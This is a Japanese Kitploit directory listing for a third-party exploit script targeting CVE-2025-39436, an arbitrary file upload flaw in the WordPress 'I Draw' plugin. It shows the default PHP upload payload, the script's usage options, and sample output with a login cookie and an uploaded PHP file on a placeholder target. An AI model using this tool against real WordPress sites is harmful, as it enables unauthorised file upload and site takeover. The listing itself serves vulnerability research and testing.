Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-39436 — WordPress I Draw Plugin <= 1.0 は、任意のファイルアップロードに対して脆弱です。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-39436
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2025-39436

CVE-2025-39436

WordPress I Draw Plugin <= 1.0 は、任意のファイルアップロードに対して脆弱です。

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 WordPress プラグインのエクスプロイト: CVE-2025-39436

📝 説明

危険なタイプのファイルの無制限アップロード の脆弱性が、「I Draw」WordPress プラグインに存在します。このエクスプロイトにより、攻撃者は悪意のあるファイルを無制限にアップロードできます。この問題は、I Draw バージョン 1.0 まで に影響します。


🛠️ エクスプロイトの詳細

このエクスプロイトは、プラグインのファイルアップロード機能を利用して PHP ペイロードを実行します。以下は使用されるデフォルトのペイロードです。

root@kitploit:~
php_code = "<?php echo 'Im Nxploited | Khaled Alenazi'; ?>"

🚀 使用方法

root@kitploit:~
usage: CVE-2025-39436.py [-h] -u URL -un USERNAME -p PASSWORD

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target website URL
  -un, --username USERNAME
                        Username
  -p, --password PASSWORD

💻 スクリプト出力例

root@kitploit:~
[✅] Login successful.
[🍪] Cookies here:
wordpress_logged_in_4b00801d41db6e7d9e0ed0af2c824ea0=admin%7C1746301986%7CZvXtaLwW7AlgtJ9JxOH24nAo8G6WqoSQGYcz6xGSNe1%7C53cc2f686eb1e4265e17fcb0823d5e7349ffdc7b86ec8099453b5e80e7c2b51a
[✅] File uploaded successfully:
[🔗] http://target/wp-content/uploads/2025/4/19/nxploit.php

⚠️ 免責事項

このスクリプトは教育目的のみで提供されています。作者は、このエクスプロイトによって引き起こされた誤用や損害について一切の責任を負いません。ご自身の責任で使用してください。


作者: Nxploited ( Khaled Alenazi )

ツールをダウンロード